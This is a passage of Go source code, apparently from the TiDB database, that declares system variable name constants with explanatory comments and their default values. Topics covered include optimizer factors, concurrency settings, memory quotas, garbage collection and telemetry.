TiDBDDLSlowOprThreshold = "ddl_slow_threshold"
// tidb_snapshot is used for reading history data, the default value is empty string.
// The value can be a datetime string like '2017-11-11 20:20:20' or a tso string. When this variable is set, the session reads history data of that time.
TiDBSnapshot = "tidb_snapshot"
// tidb_opt_agg_push_down is used to enable/disable the optimizer rule of aggregation push down.
TiDBOptAggPushDown = "tidb_opt_agg_push_down"
// TiDBOptBCJ is used to enable/disable broadcast join in MPP mode
TiDBOptBCJ = "tidb_opt_broadcast_join"
// TiDBOptCartesianBCJ is used to disable/enable broadcast cartesian join in MPP mode
TiDBOptCartesianBCJ = "tidb_opt_broadcast_cartesian_join"
TiDBOptMPPOuterJoinFixedBuildSide = "tidb_opt_mpp_outer_join_fixed_build_side"
// tidb_opt_distinct_agg_push_down is used to decide whether agg with distinct should be pushed to tikv/tiflash.
TiDBOptDistinctAggPushDown = "tidb_opt_distinct_agg_push_down"
// tidb_broadcast_join_threshold_size is used to limit the size of small table for mpp broadcast join.
// It's unit is bytes, if the size of small table is larger than it, we will not use bcj.
TiDBBCJThresholdSize = "tidb_broadcast_join_threshold_size"
// tidb_broadcast_join_threshold_count is used to limit the count of small table for mpp broadcast join.
// If we can't estimate the size of one side of join child, we will check if its row number exceeds this limitation.
TiDBBCJThresholdCount = "tidb_broadcast_join_threshold_count"
// tidb_opt_write_row_id is used to enable/disable the operations of insert、replace and update to _tidb_rowid.
TiDBOptWriteRowID = "tidb_opt_write_row_id"
// Auto analyze will run if (table modify count)/(table row count) is greater than this value.
TiDBAutoAnalyzeRatio = "tidb_auto_analyze_ratio"
// Auto analyze will run if current time is within start time and end time.
TiDBAutoAnalyzeStartTime = "tidb_auto_analyze_start_time"
TiDBAutoAnalyzeEndTime = "tidb_auto_analyze_end_time"
// tidb_checksum_table_concurrency is used to speed up the ADMIN CHECKSUM TABLE
// statement, when a table has multiple indices, those indices can be
// scanned concurrently, with the cost of higher system performance impact.
TiDBChecksumTableConcurrency = "tidb_checksum_table_concurrency"
// TiDBCurrentTS is used to get the current transaction timestamp.
// It is read-only.
TiDBCurrentTS = "tidb_current_ts"
// TiDBLastTxnInfo is used to get the last transaction info within the current session.
TiDBLastTxnInfo = "tidb_last_txn_info"
// TiDBLastTxnInfo is used to get the last query info within the current session.
TiDBLastQueryInfo = "tidb_last_query_info"
// tidb_config is a read-only variable that shows the config of the current server.
TiDBConfig = "tidb_config"
// tidb_batch_insert is used to enable/disable auto-split insert data. If set this option on, insert executor will automatically
// insert data into multiple batches and use a single txn for each batch. This will be helpful when inserting large data.
TiDBBatchInsert = "tidb_batch_insert"
// tidb_batch_delete is used to enable/disable auto-split delete data. If set this option on, delete executor will automatically
// split data into multiple batches and use a single txn for each batch. This will be helpful when deleting large data.
TiDBBatchDelete = "tidb_batch_delete"
// tidb_batch_commit is used to enable/disable auto-split the transaction.
// If set this option on, the transaction will be committed when it reaches stmt-count-limit and starts a new transaction.
TiDBBatchCommit = "tidb_batch_commit"
// tidb_dml_batch_size is used to split the insert/delete data into small batches.
// It only takes effort when tidb_batch_insert/tidb_batch_delete is on.
// Its default value is 20000. When the row size is large, 20k rows could be larger than 100MB.
// User could change it to a smaller one to avoid breaking the transaction size limitation.
TiDBDMLBatchSize = "tidb_dml_batch_size"
// The following session variables controls the memory quota during query execution.
// "tidb_mem_quota_query": control the memory quota of a query.
TiDBMemQuotaQuery = "tidb_mem_quota_query" // Bytes.
TiDBMemQuotaApplyCache = "tidb_mem_quota_apply_cache"
// TODO: remove them below sometime, it should have only one Quota(TiDBMemQuotaQuery).
TiDBMemQuotaHashJoin = "tidb_mem_quota_hashjoin" // Bytes.
TiDBMemQuotaMergeJoin = "tidb_mem_quota_mergejoin" // Bytes.
TiDBMemQuotaSort = "tidb_mem_quota_sort" // Bytes.
TiDBMemQuotaTopn = "tidb_mem_quota_topn" // Bytes.
TiDBMemQuotaIndexLookupReader = "tidb_mem_quota_indexlookupreader" // Bytes.
TiDBMemQuotaIndexLookupJoin = "tidb_mem_quota_indexlookupjoin" // Bytes.
// tidb_general_log is used to log every query in the server in info level.
TiDBGeneralLog = "tidb_general_log"
// tidb_pprof_sql_cpu is used to add label sql label to pprof result.
TiDBPProfSQLCPU = "tidb_pprof_sql_cpu"
// tidb_retry_limit is the maximum number of retries when committing a transaction.
TiDBRetryLimit = "tidb_retry_limit"
// tidb_disable_txn_auto_retry disables transaction auto retry.
TiDBDisableTxnAutoRetry = "tidb_disable_txn_auto_retry"
// Deprecated: tidb_enable_streaming enables TiDB to use streaming API for coprocessor requests.
TiDBEnableStreaming = "tidb_enable_streaming"
// tidb_enable_chunk_rpc enables TiDB to use Chunk format for coprocessor requests.
TiDBEnableChunkRPC = "tidb_enable_chunk_rpc"
// tidb_optimizer_selectivity_level is used to control the selectivity estimation level.
TiDBOptimizerSelectivityLevel = "tidb_optimizer_selectivity_level"
// tidb_txn_mode is used to control the transaction behavior.
TiDBTxnMode = "tidb_txn_mode"
// tidb_row_format_version is used to control tidb row format version current.
TiDBRowFormatVersion = "tidb_row_format_version"
// tidb_enable_table_partition is used to control table partition feature.
// The valid value include auto/on/off:
// on or auto: enable table partition if the partition type is implemented.
// off: always disable table partition.
TiDBEnableTablePartition = "tidb_enable_table_partition"
// tidb_enable_list_partition is used to control list table partition feature.
TiDBEnableListTablePartition = "tidb_enable_list_partition"
// tidb_skip_isolation_level_check is used to control whether to return error when set unsupported transaction
// isolation level.
TiDBSkipIsolationLevelCheck = "tidb_skip_isolation_level_check"
// TiDBLowResolutionTSO is used for reading data with low resolution TSO which is updated once every two seconds
TiDBLowResolutionTSO = "tidb_low_resolution_tso"
// TiDBReplicaRead is used for reading data from replicas, followers for example.
TiDBReplicaRead = "tidb_replica_read"
// TiDBAllowRemoveAutoInc indicates whether a user can drop the auto_increment column attribute or not.
TiDBAllowRemoveAutoInc = "tidb_allow_remove_auto_inc"
// TiDBMultiStatementMode enables multi statement at the risk of SQL injection
// provides backwards compatibility
TiDBMultiStatementMode = "tidb_multi_statement_mode"
// TiDBEvolvePlanTaskMaxTime controls the max time of a single evolution task.
TiDBEvolvePlanTaskMaxTime = "tidb_evolve_plan_task_max_time"
// TiDBEvolvePlanTaskStartTime is the start time of evolution task.
TiDBEvolvePlanTaskStartTime = "tidb_evolve_plan_task_start_time"
// TiDBEvolvePlanTaskEndTime is the end time of evolution task.
TiDBEvolvePlanTaskEndTime = "tidb_evolve_plan_task_end_time"
// tidb_slow_log_threshold is used to set the slow log threshold in the server.
TiDBSlowLogThreshold = "tidb_slow_log_threshold"
// tidb_record_plan_in_slow_log is used to log the plan of the slow query.
TiDBRecordPlanInSlowLog = "tidb_record_plan_in_slow_log"
// tidb_enable_slow_log enables TiDB to log slow queries.
TiDBEnableSlowLog = "tidb_enable_slow_log"
// tidb_query_log_max_len is used to set the max length of the query in the log.
TiDBQueryLogMaxLen = "tidb_query_log_max_len"
// TiDBCheckMb4ValueInUTF8 is used to control whether to enable the check wrong utf8 value.
TiDBCheckMb4ValueInUTF8 = "tidb_check_mb4_value_in_utf8"
// TiDBFoundInPlanCache indicates whether the last statement was found in plan cache
TiDBFoundInPlanCache = "last_plan_from_cache"
// TiDBFoundInBinding indicates whether the last statement was matched with the hints in the binding.
TiDBFoundInBinding = "last_plan_from_binding"
// TiDBAllowAutoRandExplicitInsert indicates whether explicit insertion on auto_random column is allowed.
TiDBAllowAutoRandExplicitInsert = "allow_auto_random_explicit_insert"
// TiDBTxnScope indicates whether using global transactions or local transactions.
TiDBTxnScope = "txn_scope"
// TiDBTxnReadTS indicates the next transaction should be staleness transaction and provide the startTS
TiDBTxnReadTS = "tx_read_ts"
)
// TiDB system variable names that both in session and global scope.
const (
// tidb_build_stats_concurrency is used to speed up the ANALYZE statement, when a table has multiple indices,
// those indices can be scanned concurrently, with the cost of higher system performance impact.
TiDBBuildStatsConcurrency = "tidb_build_stats_concurrency"
// tidb_distsql_scan_concurrency is used to set the concurrency of a distsql scan task.
// A distsql scan task can be a table scan or a index scan, which may be distributed to many TiKV nodes.
// Higher concurrency may reduce latency, but with the cost of higher memory usage and system performance impact.
// If the query has a LIMIT clause, high concurrency makes the system do much more work than needed.
TiDBDistSQLScanConcurrency = "tidb_distsql_scan_concurrency"
// tidb_opt_insubquery_to_join_and_agg is used to enable/disable the optimizer rule of rewriting IN subquery.
TiDBOptInSubqToJoinAndAgg = "tidb_opt_insubq_to_join_and_agg"
// tidb_opt_prefer_range_scan is used to enable/disable the optimizer to always prefer range scan over table scan, ignoring their costs.
TiDBOptPreferRangeScan = "tidb_opt_prefer_range_scan"
// tidb_opt_correlation_threshold is a guard to enable row count estimation using column order correlation.
TiDBOptCorrelationThreshold = "tidb_opt_correlation_threshold"
// tidb_opt_correlation_exp_factor is an exponential factor to control heuristic approach when tidb_opt_correlation_threshold is not satisfied.
TiDBOptCorrelationExpFactor = "tidb_opt_correlation_exp_factor"
// tidb_opt_cpu_factor is the CPU cost of processing one expression for one row.
TiDBOptCPUFactor = "tidb_opt_cpu_factor"
// tidb_opt_copcpu_factor is the CPU cost of processing one expression for one row in coprocessor.
TiDBOptCopCPUFactor = "tidb_opt_copcpu_factor"
// tidb_opt_tiflash_concurrency_factor is concurrency number of tiflash computation.
TiDBOptTiFlashConcurrencyFactor = "tidb_opt_tiflash_concurrency_factor"
// tidb_opt_network_factor is the network cost of transferring 1 byte data.
TiDBOptNetworkFactor = "tidb_opt_network_factor"
// tidb_opt_scan_factor is the IO cost of scanning 1 byte data on TiKV.
TiDBOptScanFactor = "tidb_opt_scan_factor"
// tidb_opt_desc_factor is the IO cost of scanning 1 byte data on TiKV in desc order.
TiDBOptDescScanFactor = "tidb_opt_desc_factor"
// tidb_opt_seek_factor is the IO cost of seeking the start value in a range on TiKV or TiFlash.
TiDBOptSeekFactor = "tidb_opt_seek_factor"
// tidb_opt_memory_factor is the memory cost of storing one tuple.
TiDBOptMemoryFactor = "tidb_opt_memory_factor"
// tidb_opt_disk_factor is the IO cost of reading/writing one byte to temporary disk.
TiDBOptDiskFactor = "tidb_opt_disk_factor"
// tidb_opt_concurrency_factor is the CPU cost of additional one goroutine.
TiDBOptConcurrencyFactor = "tidb_opt_concurrency_factor"
// tidb_index_join_batch_size is used to set the batch size of a index lookup join.
// The index lookup join fetches batches of data from outer executor and constructs ranges for inner executor.
// This value controls how much of data in a batch to do the index join.
// Large value may reduce the latency but consumes more system resource.
TiDBIndexJoinBatchSize = "tidb_index_join_batch_size"
// tidb_index_lookup_size is used for index lookup executor.
// The index lookup executor first scan a batch of handles from a index, then use those handles to lookup the table
// rows, this value controls how much of handles in a batch to do a lookup task.
// Small value sends more RPCs to TiKV, consume more system resource.
// Large value may do more work than needed if the query has a limit.
TiDBIndexLookupSize = "tidb_index_lookup_size"
// tidb_index_lookup_concurrency is used for index lookup executor.
// A lookup task may have 'tidb_index_lookup_size' of handles at maximun, the handles may be distributed
// in many TiKV nodes, we executes multiple concurrent index lookup tasks concurrently to reduce the time
// waiting for a task to finish.
// Set this value higher may reduce the latency but consumes more system resource.
// tidb_index_lookup_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBIndexLookupConcurrency = "tidb_index_lookup_concurrency"
// tidb_index_lookup_join_concurrency is used for index lookup join executor.
// IndexLookUpJoin starts "tidb_index_lookup_join_concurrency" inner workers
// to fetch inner rows and join the matched (outer, inner) row pairs.
// tidb_index_lookup_join_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBIndexLookupJoinConcurrency = "tidb_index_lookup_join_concurrency"
// tidb_index_serial_scan_concurrency is used for controlling the concurrency of index scan operation
// when we need to keep the data output order the same as the order of index data.
TiDBIndexSerialScanConcurrency = "tidb_index_serial_scan_concurrency"
// TiDBMaxChunkSize is used to control the max chunk size during query execution.
TiDBMaxChunkSize = "tidb_max_chunk_size"
// TiDBAllowBatchCop means if we should send batch coprocessor to TiFlash. It can be set to 0, 1 and 2.
// 0 means never use batch cop, 1 means use batch cop in case of aggregation and join, 2, means to force to send batch cop for any query.
// The default value is 0
TiDBAllowBatchCop = "tidb_allow_batch_cop"
// TiDBAllowMPPExecution means if we should use mpp way to execute query or not.
// Default value is `true`, means to be determined by the optimizer.
// Value set to `false` means never use mpp.
TiDBAllowMPPExecution = "tidb_allow_mpp"
// TiDBEnforceMPPExecution means if we should enforce mpp way to execute query or not.
// Default value is `false`, means to be determined by variable `tidb_allow_mpp`.
// Value set to `true` means enforce use mpp.
// Note if you want to set `tidb_enforce_mpp` to `true`, you must set `tidb_allow_mpp` to `true` first.
TiDBEnforceMPPExecution = "tidb_enforce_mpp"
// TiDBInitChunkSize is used to control the init chunk size during query execution.
TiDBInitChunkSize = "tidb_init_chunk_size"
// tidb_enable_cascades_planner is used to control whether to enable the cascades planner.
TiDBEnableCascadesPlanner = "tidb_enable_cascades_planner"
// tidb_skip_utf8_check skips the UTF8 validate process, validate UTF8 has performance cost, if we can make sure
// the input string values are valid, we can skip the check.
TiDBSkipUTF8Check = "tidb_skip_utf8_check"
// tidb_skip_ascii_check skips the ASCII validate process
// old tidb may already have fields with invalid ASCII bytes
// disable ASCII validate can guarantee a safe replication
TiDBSkipASCIICheck = "tidb_skip_ascii_check"
// tidb_hash_join_concurrency is used for hash join executor.
// The hash join outer executor starts multiple concurrent join workers to probe the hash table.
// tidb_hash_join_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBHashJoinConcurrency = "tidb_hash_join_concurrency"
// tidb_projection_concurrency is used for projection operator.
// This variable controls the worker number of projection operator.
// tidb_projection_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBProjectionConcurrency = "tidb_projection_concurrency"
// tidb_hashagg_partial_concurrency is used for hash agg executor.
// The hash agg executor starts multiple concurrent partial workers to do partial aggregate works.
// tidb_hashagg_partial_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBHashAggPartialConcurrency = "tidb_hashagg_partial_concurrency"
// tidb_hashagg_final_concurrency is used for hash agg executor.
// The hash agg executor starts multiple concurrent final workers to do final aggregate works.
// tidb_hashagg_final_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBHashAggFinalConcurrency = "tidb_hashagg_final_concurrency"
// tidb_window_concurrency is used for window parallel executor.
// tidb_window_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBWindowConcurrency = "tidb_window_concurrency"
// tidb_merge_join_concurrency is used for merge join parallel executor
TiDBMergeJoinConcurrency = "tidb_merge_join_concurrency"
// tidb_stream_agg_concurrency is used for stream aggregation parallel executor.
// tidb_stream_agg_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBStreamAggConcurrency = "tidb_streamagg_concurrency"
// tidb_enable_parallel_apply is used for parallel apply.
TiDBEnableParallelApply = "tidb_enable_parallel_apply"
// tidb_backoff_lock_fast is used for tikv backoff base time in milliseconds.
TiDBBackoffLockFast = "tidb_backoff_lock_fast"
// tidb_backoff_weight is used to control the max back off time in TiDB.
// The default maximum back off time is a small value.
// BackOffWeight could multiply it to let the user adjust the maximum time for retrying.
// Only positive integers can be accepted, which means that the maximum back off time can only grow.
TiDBBackOffWeight = "tidb_backoff_weight"
// tidb_ddl_reorg_worker_cnt defines the count of ddl reorg workers.
TiDBDDLReorgWorkerCount = "tidb_ddl_reorg_worker_cnt"
// tidb_ddl_reorg_batch_size defines the transaction batch size of ddl reorg workers.
TiDBDDLReorgBatchSize = "tidb_ddl_reorg_batch_size"
// tidb_ddl_error_count_limit defines the count of ddl error limit.
TiDBDDLErrorCountLimit = "tidb_ddl_error_count_limit"
// tidb_ddl_reorg_priority defines the operations priority of adding indices.
// It can be: PRIORITY_LOW, PRIORITY_NORMAL, PRIORITY_HIGH
TiDBDDLReorgPriority = "tidb_ddl_reorg_priority"
// TiDBEnableChangeMultiSchema is used to control whether to enable the change multi schema.
TiDBEnableChangeMultiSchema = "tidb_enable_change_multi_schema"
// TiDBEnablePointGetCache is used to control whether to enable the point get cache for special scenario.
TiDBEnablePointGetCache = "tidb_enable_point_get_cache"
// TiDBEnableAlterPlacement is used to control whether to enable alter table partition.
TiDBEnableAlterPlacement = "tidb_enable_alter_placement"
// tidb_max_delta_schema_count defines the max length of deltaSchemaInfos.
// deltaSchemaInfos is a queue that maintains the history of schema changes.
TiDBMaxDeltaSchemaCount = "tidb_max_delta_schema_count"
// tidb_scatter_region will scatter the regions for DDLs when it is ON.
TiDBScatterRegion = "tidb_scatter_region"
// TiDBWaitSplitRegionFinish defines the split region behaviour is sync or async.
TiDBWaitSplitRegionFinish = "tidb_wait_split_region_finish"
// TiDBWaitSplitRegionTimeout uses to set the split and scatter region back off time.
TiDBWaitSplitRegionTimeout = "tidb_wait_split_region_timeout"
// tidb_force_priority defines the operations priority of all statements.
// It can be "NO_PRIORITY", "LOW_PRIORITY", "HIGH_PRIORITY", "DELAYED"
TiDBForcePriority = "tidb_force_priority"
// tidb_constraint_check_in_place indicates to check the constraint when the SQL executing.
// It could hurt the performance of bulking insert when it is ON.
TiDBConstraintCheckInPlace = "tidb_constraint_check_in_place"
// tidb_enable_window_function is used to control whether to enable the window function.
TiDBEnableWindowFunction = "tidb_enable_window_function"
// tidb_enable_pipelined_window_function is used to control whether to use pipelined window function, it only works when tidb_enable_window_function = true.
TiDBEnablePipelinedWindowFunction = "tidb_enable_pipelined_window_function"
// tidb_enable_strict_double_type_check is used to control table field double type syntax check.
TiDBEnableStrictDoubleTypeCheck = "tidb_enable_strict_double_type_check"
// tidb_enable_vectorized_expression is used to control whether to enable the vectorized expression evaluation.
TiDBEnableVectorizedExpression = "tidb_enable_vectorized_expression"
// TiDBOptJoinReorderThreshold defines the threshold less than which
// we'll choose a rather time consuming algorithm to calculate the join order.
TiDBOptJoinReorderThreshold = "tidb_opt_join_reorder_threshold"
// SlowQueryFile indicates which slow query log file for SLOW_QUERY table to parse.
TiDBSlowQueryFile = "tidb_slow_query_file"
// TiDBEnableFastAnalyze indicates to use fast analyze.
TiDBEnableFastAnalyze = "tidb_enable_fast_analyze"
// TiDBExpensiveQueryTimeThreshold indicates the time threshold of expensive query.
TiDBExpensiveQueryTimeThreshold = "tidb_expensive_query_time_threshold"
// TiDBEnableIndexMerge indicates to generate IndexMergePath.
TiDBEnableIndexMerge = "tidb_enable_index_merge"
// TiDBEnableNoopFuncs set true will enable using fake funcs(like get_lock release_lock)
TiDBEnableNoopFuncs = "tidb_enable_noop_functions"
// TiDBEnableStmtSummary indicates whether the statement summary is enabled.
TiDBEnableStmtSummary = "tidb_enable_stmt_summary"
// TiDBStmtSummaryInternalQuery indicates whether the statement summary contain internal query.
TiDBStmtSummaryInternalQuery = "tidb_stmt_summary_internal_query"
// TiDBStmtSummaryRefreshInterval indicates the refresh interval in seconds for each statement summary.
TiDBStmtSummaryRefreshInterval = "tidb_stmt_summary_refresh_interval"
// TiDBStmtSummaryHistorySize indicates the history size of each statement summary.
TiDBStmtSummaryHistorySize = "tidb_stmt_summary_history_size"
// TiDBStmtSummaryMaxStmtCount indicates the max number of statements kept in memory.
TiDBStmtSummaryMaxStmtCount = "tidb_stmt_summary_max_stmt_count"
// TiDBStmtSummaryMaxSQLLength indicates the max length of displayed normalized sql and sample sql.
TiDBStmtSummaryMaxSQLLength = "tidb_stmt_summary_max_sql_length"
// TiDBCapturePlanBaseline indicates whether the capture of plan baselines is enabled.
TiDBCapturePlanBaseline = "tidb_capture_plan_baselines"
// TiDBUsePlanBaselines indicates whether the use of plan baselines is enabled.
TiDBUsePlanBaselines = "tidb_use_plan_baselines"
// TiDBEvolvePlanBaselines indicates whether the evolution of plan baselines is enabled.
TiDBEvolvePlanBaselines = "tidb_evolve_plan_baselines"
// TiDBEnableExtendedStats indicates whether the extended statistics feature is enabled.
TiDBEnableExtendedStats = "tidb_enable_extended_stats"
// TiDBIsolationReadEngines indicates the tidb only read from the stores whose engine type is involved in IsolationReadEngines.
// Now, only support TiKV and TiFlash.
TiDBIsolationReadEngines = "tidb_isolation_read_engines"
// TiDBStoreLimit indicates the limit of sending request to a store, 0 means without limit.
TiDBStoreLimit = "tidb_store_limit"
// TiDBMetricSchemaStep indicates the step when query metric schema.
TiDBMetricSchemaStep = "tidb_metric_query_step"
// TiDBMetricSchemaRangeDuration indicates the range duration when query metric schema.
TiDBMetricSchemaRangeDuration = "tidb_metric_query_range_duration"
// TiDBEnableCollectExecutionInfo indicates that whether execution info is collected.
TiDBEnableCollectExecutionInfo = "tidb_enable_collect_execution_info"
// DefExecutorConcurrency is used for controlling the concurrency of all types of executors.
TiDBExecutorConcurrency = "tidb_executor_concurrency"
// TiDBEnableClusteredIndex indicates if clustered index feature is enabled.
TiDBEnableClusteredIndex = "tidb_enable_clustered_index"
// TiDBPartitionPruneMode indicates the partition prune mode used.
TiDBPartitionPruneMode = "tidb_partition_prune_mode"
// TiDBSlowLogMasking is deprecated and a alias of TiDBRedactLog.
// Deprecated: use TiDBRedactLog instead.
TiDBSlowLogMasking = "tidb_slow_log_masking"
// TiDBRedactLog indicates that whether redact log.
TiDBRedactLog = "tidb_redact_log"
// TiDBShardAllocateStep indicates the max size of continuous rowid shard in one transaction.
TiDBShardAllocateStep = "tidb_shard_allocate_step"
// TiDBEnableTelemetry indicates that whether usage data report to PingCAP is enabled.
TiDBEnableTelemetry = "tidb_enable_telemetry"
// TiDBEnableAmendPessimisticTxn indicates if amend pessimistic transactions is enabled.
TiDBEnableAmendPessimisticTxn = "tidb_enable_amend_pessimistic_txn"
// TiDBMemoryUsageAlarmRatio indicates the alarm threshold when memory usage of the tidb-server exceeds.
TiDBMemoryUsageAlarmRatio = "tidb_memory_usage_alarm_ratio"
// TiDBEnableRateLimitAction indicates whether enabled ratelimit action
TiDBEnableRateLimitAction = "tidb_enable_rate_limit_action"
// TiDBEnableAsyncCommit indicates whether to enable the async commit feature.
TiDBEnableAsyncCommit = "tidb_enable_async_commit"
// TiDBEnable1PC indicates whether to enable the one-phase commit feature.
TiDBEnable1PC = "tidb_enable_1pc"
// TiDBGuaranteeLinearizability indicates whether to guarantee linearizability.
TiDBGuaranteeLinearizability = "tidb_guarantee_linearizability"
// TiDBAnalyzeVersion indicates the how tidb collects the analyzed statistics and how use to it.
TiDBAnalyzeVersion = "tidb_analyze_version"
// TiDBEnableIndexMergeJoin indicates whether to enable index merge join.
TiDBEnableIndexMergeJoin = "tidb_enable_index_merge_join"
// TiDBTrackAggregateMemoryUsage indicates whether track the memory usage of aggregate function.
TiDBTrackAggregateMemoryUsage = "tidb_track_aggregate_memory_usage"
// TiDBEnableExchangePartition indicates whether to enable exchange partition.
TiDBEnableExchangePartition = "tidb_enable_exchange_partition"
// TiDBAllowFallbackToTiKV indicates the engine types whose unavailability triggers fallback to TiKV.
// Now we only support TiFlash.
TiDBAllowFallbackToTiKV = "tidb_allow_fallback_to_tikv"
// TiDBEnableTopSQL indicates whether the top SQL is enabled.
TiDBEnableTopSQL = "tidb_enable_top_sql"
// TiDBTopSQLAgentAddress indicates the top SQL agent address.
TiDBTopSQLAgentAddress = "tidb_top_sql_agent_address"
// TiDBTopSQLPrecisionSeconds indicates the top SQL precision seconds.
TiDBTopSQLPrecisionSeconds = "tidb_top_sql_precision_seconds"
// TiDBTopSQLMaxStatementCount indicates the max number of statements been collected.
TiDBTopSQLMaxStatementCount = "tidb_top_sql_max_statement_count"
// TiDBTopSQLMaxCollect indicates the max capacity of the collect map.
TiDBTopSQLMaxCollect = "tidb_top_sql_max_collect"
// TiDBTopSQLReportIntervalSeconds indicates the top SQL report interval seconds.
TiDBTopSQLReportIntervalSeconds = "tidb_top_sql_report_interval_seconds"
// TiDBEnableGlobalTemporaryTable indicates whether to enable global temporary table
TiDBEnableGlobalTemporaryTable = "tidb_enable_global_temporary_table"
// TiDBEnableLocalTxn indicates whether to enable Local Txn.
TiDBEnableLocalTxn = "tidb_enable_local_txn"
// TiDBEnableOrderedResultMode indicates if stabilize query results.
TiDBEnableOrderedResultMode = "tidb_enable_ordered_result_mode"
)
// TiDB vars that have only global scope
const (
// TiDBGCEnable turns garbage collection on or OFF
TiDBGCEnable = "tidb_gc_enable"
// TiDBGCRunInterval sets the interval that GC runs
TiDBGCRunInterval = "tidb_gc_run_interval"
// TiDBGCLifetime sets the retention window of older versions
TiDBGCLifetime = "tidb_gc_life_time"
// TiDBGCConcurrency sets the concurrency of garbage collection. -1 = AUTO value
TiDBGCConcurrency = "tidb_gc_concurrency"
// TiDBGCScanLockMode enables the green GC feature (default)
TiDBGCScanLockMode = "tidb_gc_scan_lock_mode"
// TiDBEnableEnhancedSecurity restricts SUPER users from certain operations.
TiDBEnableEnhancedSecurity = "tidb_enable_enhanced_security"
)
// Default TiDB system variable values.
const (
DefHostname = "localhost"
DefIndexLookupConcurrency = ConcurrencyUnset
DefIndexLookupJoinConcurrency = ConcurrencyUnset
DefIndexSerialScanConcurrency = 1
DefIndexJoinBatchSize = 25000
DefIndexLookupSize = 20000
DefDistSQLScanConcurrency = 15
DefBuildStatsConcurrency = 4
DefAutoAnalyzeRatio = 0.5
DefAutoAnalyzeStartTime = "00:00 +0000"
DefAutoAnalyzeEndTime = "23:59 +0000"
DefAutoIncrementIncrement = 1
DefAutoIncrementOffset = 1
DefChecksumTableConcurrency = 4
DefSkipUTF8Check = false
DefSkipASCIICheck = false
DefOptAggPushDown = false
DefOptBCJ = false
DefOptCartesianBCJ = 1
DefOptMPPOuterJoinFixedBuildSide = false
DefOptWriteRowID = false
DefOptCorrelationThreshold = 0.9
DefOptCorrelationExpFactor = 1
DefOptCPUFactor = 3.0
DefOptCopCPUFactor = 3.0
DefOptTiFlashConcurrencyFactor = 24.0
DefOptNetworkFactor = 1.0
DefOptScanFactor = 1.5
DefOptDescScanFactor = 3.0
DefOptSeekFactor = 20.0
DefOptMemoryFactor = 0.001
DefOptDiskFactor = 1.5
DefOptConcurrencyFactor = 3.0
DefOptInSubqToJoinAndAgg = true
DefOptPreferRangeScan = false
DefBatchInsert = false
DefBatchDelete = false
DefBatchCommit = false
DefCurretTS = 0
DefInitChunkSize = 32
DefMaxChunkSize = 1024
DefDMLBatchSize = 0
DefMaxPreparedStmtCount = -1
DefWaitTimeout = 0
DefTiDBMemQuotaApplyCache = 32 << 20 // 32MB.
DefTiDBMemQuotaHashJoin = 32 << 30 // 32GB.
DefTiDBMemQuotaMergeJoin = 32 << 30 // 32GB.
DefTiDBMemQuotaSort = 32 << 30 // 32GB.
DefTiDBMemQuotaTopn = 32 << 30 // 32GB.
DefTiDBMemQuotaIndexLookupReader = 32 << 30 // 32GB.
DefTiDBMemQuotaIndexLookupJoin = 32 << 30 // 32GB.
DefTiDBMemQuotaDistSQL = 32 << 30 // 32GB.
DefTiDBGeneralLog = false
DefTiDBPProfSQLCPU = 0
DefTiDBRetryLimit = 10
DefTiDBDisableTxnAutoRetry = true
DefTiDBConstraintCheckInPlace = false
DefTiDBHashJoinConcurrency = ConcurrencyUnset
DefTiDBProjectionConcurrency = ConcurrencyUnset
DefBroadcastJoinThresholdSize = 100 * 1024 * 1024
DefBroadcastJoinThresholdCount = 10 * 1024
DefTiDBOptimizerSelectivityLevel = 0
DefTiDBAllowBatchCop = 1
DefTiDBAllowMPPExecution = true
DefTiDBEnforceMPPExecution = false
DefTiDBTxnMode = ""
DefTiDBRowFormatV1 = 1
DefTiDBRowFormatV2 = 2
DefTiDBDDLReorgWorkerCount = 4
DefTiDBDDLReorgBatchSize = 256
DefTiDBDDLErrorCountLimit = 512
DefTiDBMaxDeltaSchemaCount = 1024
DefTiDBChangeMultiSchema = false
DefTiDBPointGetCache = false
DefTiDBEnableAlterPlacement = false
DefTiDBHashAggPartialConcurrency = ConcurrencyUnset
DefTiDBHashAggFinalConcurrency = ConcurrencyUnset
DefTiDBWindowConcurrency = ConcurrencyUnset
DefTiDBMergeJoinConcurrency = 1 // disable optimization by default
DefTiDBStreamAggConcurrency = 1
DefTiDBForcePriority = mysql.NoPriority
DefEnableWindowFunction = true
DefEnablePipelinedWindowFunction = true
DefEnableStrictDoubleTypeCheck = true
DefEnableVectorizedExpression = true
DefTiDBOptJoinReorderThreshold = 0
DefTiDBDDLSlowOprThreshold = 300
DefTiDBUseFastAnalyze = false
DefTiDBSkipIsolationLevelCheck = false
DefTiDBExpensiveQueryTimeThreshold = 60 // 60s
DefTiDBScatterRegion = false
DefTiDBWaitSplitRegionFinish = true
DefWaitSplitRegionTimeout = 300 // 300s
DefTiDBEnableNoopFuncs = false
DefTiDBAllowRemoveAutoInc = false
DefTiDBUsePlanBaselines = true
DefTiDBEvolvePlanBaselines = false
DefTiDBEvolvePlanTaskMaxTime = 600 // 600s
DefTiDBEvolvePlanTaskStartTime = "00:00 +0000"
DefTiDBEvolvePlanTaskEndTime = "23:59 +0000"
DefInnodbLockWaitTimeout = 50 // 50s
DefTiDBStoreLimit = 0
DefTiDBMetricSchemaStep = 60 // 60s
DefTiDBMetricSchemaRangeDuration = 60 // 60s
DefTiDBFoundInPlanCache = false
DefTiDBFoundInBinding = false
DefTiDBEnableCollectExecutionInfo = true
DefTiDBAllowAutoRandExplicitInsert = false
DefTiDBEnableClusteredIndex = ClusteredIndexDefModeIntOnly
DefTiDBRedactLog = false
DefTiDBShardAllocateStep = math.MaxInt64
DefTiDBEnableTelemetry = true
DefTiDBEnableParallelApply = false
DefTiDBEnableAmendPessimisticTxn = false
DefTiDBPartitionPruneMode = "static"
DefTiDBEnableRateLimitAction = true
DefTiDBEnableAsyncCommit = false
DefTiDBEnable1PC = false
DefTiDBGuaranteeLinearizability = true
DefTiDBAnalyzeVersion = 2
DefTiDBEnableIndexMergeJoin = false
DefTiDBTrackAggregateMemoryUsage = true
DefTiDBEnableExchangePartition = false
DefCTEMaxRecursionDepth = 1000
DefTiDBTopSQLEnable = false
DefTiDBTopSQLAgentAddress = ""
